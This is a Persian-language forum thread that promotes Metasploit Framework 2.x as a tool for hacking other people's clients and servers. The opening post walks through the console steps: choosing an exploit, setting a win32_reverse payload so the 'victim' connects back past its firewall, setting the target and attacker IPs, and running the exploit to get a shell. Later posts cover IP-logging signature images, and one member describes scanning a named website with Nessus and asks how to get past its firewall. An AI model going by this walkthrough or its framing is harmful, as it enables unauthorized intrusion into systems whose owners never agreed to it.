PDA

نسخه کامل مشاهده نسخه کامل : کامل ترين و بهترين برنامه واسه هک کردن client و server(اتوماتيک)



bahareh_bus
01-10-2005, 09:44
Metasploit Framework مجموعه ای از باگ های سیستم عامل ها و برنامه های آن ها می باشد که به در یافت Shell و دسترسی کامل به سیستم هدف ختم میشود .در حال حاضر این مجموعه دارای 81
باگ می باشد که بسیاری از آن ها هنوز patch نشده وبرای هک کردن سرور و یا کلاینت ها بهترین انتخاب می باشد .این برنامه گزینه ی update داشته و خودش را بوسیله آن به روز می کند و شما را از پیدا کردن bug های جدید و compile آن ها بی نیاز میکند .این برنامه حالت های payload مختلفی داره که کارائی فراوانی هم داره برای شروع پس از دریافت آن و updtae کردن باید در داخل برنامه

تایپ کنید show exploits که با این دستور لیست باگ ها نمایش می یابد و شما میتوانید با دستور use exploit name یکی از آن ها را اجرا کنید

show PAYLOADS این دستور لیست حالت های اتصال را نمایش می ده . مثلآ و قتی در سیستم طرف firewall وجود داره با انتخاب payload ه win32_reverse با کمک این دستور set PAYLOAD win32_reverse به برنامه می گوئید که در گرفتن shell سیستم ارتباط از طرف سیستم قربانی با شما باشد تا بتواند firewall را دور بزند (چون او به شما وصل شده و فایروال تنها با دریافت مشکل داره)

set RHOST 66.66.78.44 با این دستور به برنامه می گویید که ip remote host کسی که می خواهید از آن shell بگیرید 66.66.78.44 می باشد

set LHOST 65.76.54.77 با کمک این دستور به برنامه می گوئید که ip شما 65.76.54.77 می باشد . این گزینه در حالت payload ه win32_reverse استفاده می شود تا سیستم قربانی به این ip وصل شود

show TARGETS لیست سیستم های آسیب پذیر در این باگ را نمایش میده با عدد خاص رویروی آن مثلآ All Windows 0 شما با استفاده از دستور set TARGET 0 به برنامه میگوئید که All Windows می باشد

show OPTIONS لیست متغیر های مقدار پذیر مانند RHOST و ... را با مقدار داده شده توسط شما نشان می دهد که برای کنترل درستی کار مفید می باشد

exploit این دستور با داده های ورودی شما شروع به shell گرفتن می کند

starting bind handler

get connection from

خوب فکر ميکنم قبلاً يه معرفی کوچولو از اين برنامه تو فروم ها شده بود
ولی نويسندش توضيح زيادی نداده بود.من هم تصميم گرفتم که اين برنامه رو کامل
توضيح بدم.حالا اگه به هک علاقه داری به شدت توصيه ميکنم يه بار امتحانش کنی
مزيت اين برنامه هم تو اينه که هيچ وقت دموده نميشه و ميشه اپديتش کرد.
اگه اپديتش کنی سايت هايی رو ميتونی هک کنی که اصلاً فکرشم نميکردی.
آموزش کاملاً فارسی اين برنامه رو هم به صورت کامل براتون گذشتم که ديگه حسابی
ذوق زده بشيد!!!!

download
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


اموزش فارسی(pdf)
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ](Persian).pdf

ALt3rnA
02-10-2005, 21:14
واقعا بدردم خورد .دستتون درد نکنه. من واسه خودمو گم کردم تو هيچ کدوم از سي دي هامم پيداش نکردم.الان که اينو اينجا ديدم دارم پر در ميارم!!!

samand1368
05-10-2005, 15:03
ممنون
دستت درد نکنه

arash_irani
06-10-2005, 10:59
سلام
دستت درد نكنه بهاره خانم
ميخواستم بدونم ميتونيد يه آموزش كامل قدم به قدم هم بزاري چون واقعا من هيچي از اين جور كارا بلد نيستم نميخوام حرفه اي باشه مثلا توضيح بديد كه مثلا It/ اینا چیه فقط میخوام کار با این برنامه رو یاد بگیرم از کجا شروع کنم و چطور وارد بشم
ممنون میشیم خیلی ها مثل من هستند
موفق باشید یا حق

arash_irani
06-10-2005, 11:02
راستی یه چیز دیگه من چند جای دیگه هم دیده بودم که تو فروم بچه ها نمیدونم حالا چه برنامه ای رو گذاشته بودند ولی آی پی کسی که داره صفحه رو میبینه رو نشون میده
این برنامه یا این کار رو چطور انجام میدید و تو امضاتون همچین چیزی میزارید ؟؟؟؟؟؟؟

rootnt
06-10-2005, 11:27
راستی یه چیز دیگه من چند جای دیگه هم دیده بودم که تو فروم بچه ها نمیدونم حالا چه برنامه ای رو گذاشته بودند ولی آی پی کسی که داره صفحه رو میبینه رو نشون میده
این برنامه یا این کار رو چطور انجام میدید و تو امضاتون همچین چیزی میزارید ؟؟؟؟؟؟؟
منظورتون این فیلی هست که توی امضای بهاره خانم هستش؟
ولی درست کار نمی کنه
من از لینوکس استفاده میکنم و فایر فاکس ولی اون نوشه از winxp و IE6 استفاده میکنم
تازه آدرس آیپی رو هم اشتباه نوشته
--------------------------------------------------------------------------------------------------------------------------------------
در مورد برنامه و مقاله ای هم که شما (بهاره خانم)گذاشتید باید بگم مثل ارسالهای دیگه تون عالیه :evil: کارت درسته :evil:
چون یک نوع جدید و خیلی حرفه ای هست :evil:

ALt3rnA
06-10-2005, 16:44
ولي در مورد من تمام اطلاعات اوني که در امضاي بهاره خانم هست غلطه!!

ALt3rnA
07-10-2005, 01:29
منم يه توصيه بکنم:
هر هکري اين برنامه رو رو سيستمش داره معمولا . در ضمن برنامه اپديت ميش[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]ه[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

bahareh_bus
08-10-2005, 07:19
مطمئن باشيد که اي پی همتون رو داره درست نشون ميده.

IVAN
08-10-2005, 07:50
سلام
دوستان اگه شما هم ميخواهيد يه همچين امكاني تو امضاتون ديده بشه بريد اين صفحه

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
و اون قسمتاي خالي رو پركنيد :happy:

bahareh_bus
08-10-2005, 08:00
سلام
من هم اينو اضافه کنم که
در قسمت random text ميتونيد متنی رو بنويسيد که با هر بار
رفرّش شدن صفحه نمايش داده بشه!
در مراهل بعد سايت از شما ميخواد که يه سری تبليغات رو پر
کنيد که بهتره بی خيال بشيد.
پس از ثبت نام به mail box تون رجوع کنيد تا لينکشو ببينيد!
در ضمن اين برنامه هيچ خطری نداره و فقط خودتون ميتونيد
ip تون رو ببينيد!
با تشکر

arash_irani
10-10-2005, 03:22
مطمئن باشيد که اي پی همتون رو داره درست نشون ميده.

كاملا با اين حرف بهاره خانوم موافقم
راستي بهاره خانوم من رفتم ثبت نام كنم بعد از نوشتن ايميل و اسمم وقتي رفت صفحه بعدي خيلي سوالات ديگه كرد كه من ولش كردم و صفحه رو بستم ايا بايد تمام مراحل رو ميرفتم؟ ؟

esitala
10-10-2005, 06:26
بهاره خانم لینکتون کار نمیکنه

bahareh_bus
10-10-2005, 06:41
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

پس باز شدن سايت بالا در قسمت instructions (پايين صفحه) دو تا لينک هست که ميتونيد
ازش استفاده کنيد! البته بدون ثبت نام!

Farid007
10-10-2005, 06:44
البته تا نصفش رو درست نشون میده نه همه شو

arash_irani
10-10-2005, 15:48
:biggrin: :tongue:

ALt3rnA
10-10-2005, 20:45
اخه من از اانت استفاده ميکنم اين زده اينترنت اکسپلورر 6 از ويندوز ام اي استفاده ميکنم زده ايکس پي اي پيم فقط درسته

bahareh_bus
11-10-2005, 06:36
اشکالی نداره همين سايت danasoft قرار که به زودی امکان مشخص شدن منطقه
جقرافيايی رو هم به اين برنامه اضافه کنه! و خيلی خفن تر بشه مثلاً صاحب اواتر هم
بتونه مشخصات شما رو ثبت کنه!!!

ALt3rnA
11-10-2005, 17:46
بابا اينجوري که شير تو شير ميشه!! ولي من که کاري ندارم خيالم راحته از اي پي هايدر اسفاده ميکنم اگه کسي اي پيه منو whois کنه ميزنه مکزيک!!!!

rootnt
12-10-2005, 13:05
بابا اينجوري که شير تو شير ميشه!! ولي من که کاري ندارم خيالم راحته از اي پي هايدر اسفاده ميکنم اگه کسي اي پيه منو whois کنه ميزنه مکزيک!!!!
یه خالی بست تو چرا باورت شد؟
اصلا همچین چیزی امکان نداره
در ضمن تاپیک کلا از بحث اصلی خارج شد
در مورد برنامه مذکور باید بگم من در لینوکس هم نصب کردم و باهاش کار کردم
این جور که بهاره خانم فرمودند برید کلاینت و سرور هک کنید / به همین سادگی هم نیست
البته برنامه خیلی خوبی هست
ولی فقط به درد حمله میخوره و کسی که میخواد برای شل گرفتن یا چیزهای دیگه از طریق اکسپلویت با این برنامه خیلی کارش راحت میشه (البته اگر اکسپلویتش موجود باشه)
و در ابتدا کسی که میخواد از این برنامه استفاده کنه باید اطلاعات زیادی از اکسپلویت ها و payload ها داشته باشه (من که چیزی از اینها سر در نیاوردم)
و از طرف دیگه این برنامه یک برنامه پویشگر اکسپلویت ها و آسیب پذیری ها نیست و باید قبل از کار با این برنامه مثلا با برنامه ای مثل nessus سیستم قربانی رو اسکن کنیم تا اکسپلویت مورد نظر رو پیدا کنیم و سپس اگر توی این برنامه موجود بود میشه ازش استفاده کرد.
در آخر میخواستم خواهش کنم اگر کسی آموزش نصب و کار کردن با nessus رو داره لینک دانلود بزاره (اگر فارسی باشه ممنون میشم)

Beelzebub
12-10-2005, 14:53
بابا یه خالی بست تو چرا باورت شد؟
اصلا همچین چیزی امکان نداره
در ضمن تاپیک کلا از بحث اصلی خارج شد
در مورد برنامه مذکور باید بگم من در لینوکس هم نصب کردم و باهاش کار کردم
این جور که بهاره خانم فرمودند برید کلاینت و سرور هک کنید / به همین سادگی هم نیست
البته برنامه خیلی خوبی هست
ولی فقط به درد حمله میخوره و کسی که میخواد برای شل گرفتن یا چیزهای دیگه از طریق اکسپلویت با این برنامه خیلی کارش راحت میشه (البته اگر اکسپلویتش موجود باشه)
و در ابتدا کسی که میخواد از این برنامه استفاده کنه باید اطلاعات زیادی از اکسپلویت ها و payload ها داشته باشه (من که چیزی از اینها سر در نیاوردم)
و از طرف دیگه این برنامه یک برنامه پویشگر اکسپلویت ها و آسیب پذیری ها نیست و باید قبل از کار با این برنامه مثلا با برنامه ای مثل nessus سیستم قربانی رو اسکن کنیم تا اکسپلویت مورد نظر رو پیدا کنیم و سپس اگر توی این برنامه موجود بود میشه ازش استفاده کرد.
در آخر میخواستم خواهش کنم اگر کسی آموزش نصب و کار کردن با nessus رو داره لینک دانلود بزاره (اگر فارسی باشه ممنون میشم)

منم با حرفهاي rootnt كاملا موافقم
بدون اسكن كردن كردن ندونستن باگها چطوري از اكپلويتش استفاده كنيم
در ضمن rootnt جان اين مقاله فارسي درباره nessus
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
هر چي دنباله لينكش گشتم پيدا نكردم سايتيم كه اينو گزاشته بود ديگه باز نمي شد
برايه همين اپلود كردم حالا اميدوارم اين پرشين گيگ ادا در نياره

rootnt
12-10-2005, 15:10
دمت گرم beelzebub
کارت درسته
من توی فرومهای سایت گروه امنیتی آشیانه گشت میزدم و متوجه شدم این گروه یک آموزش کامل رو توی سایتشون گذاشتند
ولی پولی هستش
حالا من نمیدونم این همون هستش یا نه
در کل به همین دلیل میگم کارت درسته

bahareh_bus
13-10-2005, 08:57
برنامه Ashiyane CGI Scanner 1 نسخه Public Edition توسط يكي از اعضاي تيم امنيتي آشيانه جناب اميد بابايي نوشته شد. در اين نسخه قابليت Scan كردن 1000 باگ امنيتي از نوع CGI قرار داده شده است.
دوستان عزيز مي توانند براي دريافت نسخه Private اين Scanner كه امكانات بيشتري نسبت به نسخه Public دارد در سايت [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] عضو شوند و Account اي از نوع Full Access در اين سايت خريداري كنند.
آدرس ايميل نويسنده برنامه: omidbabaei@yahoo.com
موفق باشيد
گروه امنيتي آشيانه
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
rootnt جان منظور اون حرفتو نفهميدم ميشه يکم بيشتر توضيح بدی؟کی خالی بسته؟؟!!؟؟

ALt3rnA
13-10-2005, 18:32
1- mazerat mekham az enke fingeleshe sohbat mekonam
2-shoma behtare bedoone man medoonam ke ham cheen cheze emkan nadare va barnameye ham be esm ip hider ro systemam nadaram ba nazaretoon ham movafegham choon emkan nadare bedoon click ba roye cheze hech gone file bar system upload she

ALt3rnA
13-10-2005, 18:35
bahareh_bus nemeshe khodet upload kone??

rootnt
13-10-2005, 18:53
rootnt جان منظور اون حرفتو نشنيدم ميشه يکم بيشتر توضيح بدی؟کی خالی بسته؟؟!!؟؟

منظورم این بود این که شما گفتی امکان نداره:


و خيلی خفن تر بشه مثلاً صاحب اواتر هم
بتونه مشخصات شما رو ثبت کنه!!!

حالا بگذریم
اگر از من بد صحبت کردم معذرت میخوام (دیگه خیلی خودمونی شدم)
من دیشب با استفاده از آموزشی که beelzebub گذاشته بود برنامه nessus 2.2.5 رو نسب کردم (خیلی سختی بود ) و باهاش سایت accir.com رو اسکن کردم
و نتونستم هیچ جواب درستی بگیرم
فکر کنم بخاطر فایر وال باشه
اول باید یه فکری به حال اون کرد
به نظر شما چی کار میشه کرد؟

ALt3rnA
13-10-2005, 19:06
bahare khanoom emzatoon kheyle bozorge age meshe ye kam kochek taresh kon

bahareh_bus
14-10-2005, 06:41
خوب شما بگو که چطوری کوچيکش کنم؟البته بدون از دست دادن کيفيتش!
من photoshop بلد نيستم!

bahareh_bus
14-10-2005, 07:02
rootnt جان اگه به اين تايپيک يه سر بزنی شايد جوابتو بگيری
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
البته اگه مشکل فايروال هست ميتونی به اينجا يه سر بزنی
تا جوابتو بگيری
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
در ضمن وقتی که ورژن جديد اين اواتری که تو امضاء منه اومد خبرت ميکنم؟
البته داخل همين سايت danasoft سمت چپ ميتونی خبرشو بخونی!

ممنون

moslem.b
14-10-2005, 08:25
من برات کوچیک کردم
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

rootnt
14-10-2005, 11:35
دستتون درد نکنه بابت لینک ها
خیلی توپه
خوشحالم که عضو همین سایت هستی


در ضمن وقتی که ورژن جديد اين اواتری که تو امضاء منه اومد خبرت ميکنم؟
البته داخل همين سايت danasoft سمت چپ ميتونی خبرشو بخونی!

باز هم میگم این امکان نداره
اینجوری دیگه هیچ کس امنیت نداره :blink:

bahareh_bus
15-10-2005, 09:38
moslem.b جان ممنون

moslem.b
16-10-2005, 23:27
خواهش میکنم بهاره خانوم

WooKMaN
14-06-2007, 22:46
Metasploit Framework 2.5


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

10.1MB

;)

criss2
12-01-2016, 00:48
دان نمیشه چرا؟